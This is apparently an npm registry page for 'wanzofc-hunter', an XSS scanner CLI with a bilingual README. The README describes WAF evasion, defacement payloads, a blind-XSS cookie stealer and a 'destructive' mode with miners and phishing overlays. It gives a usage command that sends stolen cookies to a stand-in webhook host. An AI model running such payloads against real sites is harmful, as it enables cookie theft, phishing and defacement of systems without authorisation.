npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

wanzofc-hunter

v2.0.3

Published

xss security scanner cli

Downloads

394

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

wanzofc1wanzofc1

Keywords

xsssecuritypentestscannerclibugbountyredteamwanzofc

Readme

🕸️ wanzofc-hunter v2.0 - Documentation

wanzofc-hunter is an advanced, modular XSS (Cross-Site Scripting) scanner designed for penetration testing. It features automated WAF evasion, polyglot payloads, and visual defacement capabilities.

wanzofc-hunter adalah pemindai XSS (Cross-Site Scripting) modular tingkat lanjut yang dirancang untuk uji penetrasi. Memiliki fitur bypass WAF otomatis, payload polyglot, dan kemampuan deface visual.

🚀 Key Features / Fitur Utama

1. 🛡️ Intelligent Core Engine

  • EN: Uses a sequential scanning logic with history tracking to prevent duplicate logs. Distinguishes between Reflected and Stored XSS using a "Clean URL Check" mechanism.
  • ID: Menggunakan logika scanning sekuensial dengan pelacakan riwayat untuk mencegah log ganda. Membedakan Reflected dan Stored XSS menggunakan mekanisme "Cek URL Bersih".

2. 🎭 Auto WAF Evasion (Bypass)

  • EN: Automatically generates variations for every payload to bypass Firewalls.
    • Techniques: URL Encode, Double URL Encode, Hex Encoding, HTML Entity, Base64 Wrapper.
  • ID: Secara otomatis membuat variasi untuk setiap payload guna menembus Firewall.
    • Teknik: URL Encode, Double URL Encode, Hex Encoding, HTML Entity, Base64 Wrapper.

3. 💣 Polyglot Payloads

  • EN: Uses complex payload strings capable of breaking out of multiple contexts (HTML Body, Attribute, Script Tag) simultaneously.
  • ID: Menggunakan string payload kompleks yang mampu keluar dari berbagai konteks (HTML Body, Atribut, Tag Script) secara bersamaan.

4. 🎨 Visual & Deface Payloads

  • EN: Real-time visual impact payloads to prove vulnerability.
    • Effects: CSS Kill (White screen), Rotate Chaos (180° page rotation), Blackout (Dark overlay), Fake Deface (HTML Injection).
  • ID: Payload dampak visual nyata untuk membuktikan kerentanan.
    • Efek: CSS Kill (Layar putih), Rotate Chaos (Putar halaman 180°), Blackout (Layar hitam), Fake Deface (Injeksi HTML).

5. 👻 Blind XSS & Cookie Stealer

  • EN: Supports Out-of-Band (OOB) interaction. Injects payloads that call back to your server/webhook to steal cookies or signal execution.
  • ID: Mendukung interaksi Out-of-Band (OOB). Menyuntikkan payload yang memanggil server/webhook kamu untuk mencuri cookie atau memberi sinyal eksekusi.

6. 📂 Special Vectors (File & Input)

  • EN: Targeted payloads for specific entry points.
    • File Upload: Double extension bypass (image.jpg<script>.gif), Null Byte injection.
    • Input Fields: Username limits, Bio/Profile injection, Address fields.
  • ID: Payload yang ditargetkan untuk titik masuk khusus.
    • Upload File: Bypass ekstensi ganda (image.jpg<script>.gif), Injeksi Null Byte.
    • Kolom Input: Limit username, injeksi Bio/Profil, kolom Alamat.

7. 🧨 Destructive Mode

  • EN: Aggressive payloads for stress testing (Use with caution).
    • Types: Loop Alert (Browser Hang), Miner (CPU Stress), Phishing Overlay (Fake Login Form), Redirect Loop.
  • ID: Payload agresif untuk stress testing (Gunakan dengan hati-hati).
    • Tipe: Loop Alert (Browser Hang), Miner (CPU Stress), Phishing Overlay (Form Login Palsu), Redirect Loop.

8. 🏗️ DOM XSS Scanner

  • EN: Detects client-side vulnerabilities by analyzing DOM sinks (location.hash, document.write) and sources.
  • ID: Mendeteksi kerentanan sisi klien dengan menganalisis sink DOM (location.hash, document.write) dan sumbernya.

9. 🧪 Responsive Vulnerable Lab

  • EN: Includes a built-in local server (server.js) with a responsive Dark Mode UI. Simulates Reflected, Stored, and DOM XSS scenarios perfectly.
  • ID: Termasuk server lokal bawaan (server.js) dengan UI Dark Mode yang responsif. Mensimulasikan skenario Reflected, Stored, dan DOM XSS dengan sempurna.

📖 Usage / Cara Penggunaan

Standard Scan (Reflected/DOM)

node bin/wanzofc-hunter --url "http://target.com/search?q={xss}"

Blind XSS / Stealer

node bin/wanzofc-hunter --url "http://target.com/?q={xss}" --callback "http://your-webhook.site/log"

Specific Target (File Upload)

node bin/wanzofc-hunter --url "http://target.com/upload?filename={xss}"

Run Vulnerable Lab (Localhost)

# Terminal 1
node server.js

# Terminal 2
node bin/wanzofc-hunter --url "http://localhost:3000/?q={xss}"

📂 Project Structure / Struktur Proyek

  • bin/: Executable CLI entry point.
  • cli/: CLI wrapper, help menu, banner.
  • src/core/:
    • engine.js: Main orchestrator.
    • scanner.js: Scanning logic & detection algorithms.
  • src/detectors/: Logic for Reflected, Stored, and DOM detection.
  • src/payloads/:
    • basic/: Simple script tags.
    • polyglot/: Multi-context bypasses.
    • visual/: Defacement & CSS manipulation.
    • destructive/: Miners, loopers, overlays.
    • special/: SVG, Iframe, Audio vectors.
    • files/: Filename manipulation.
  • src/utils/:
    • encoder.js: WAF evasion logic (Hex, Base64, etc).
    • http-client.js: HTTP GET/POST handler.

Author: WanzOFC Version: 2.0.0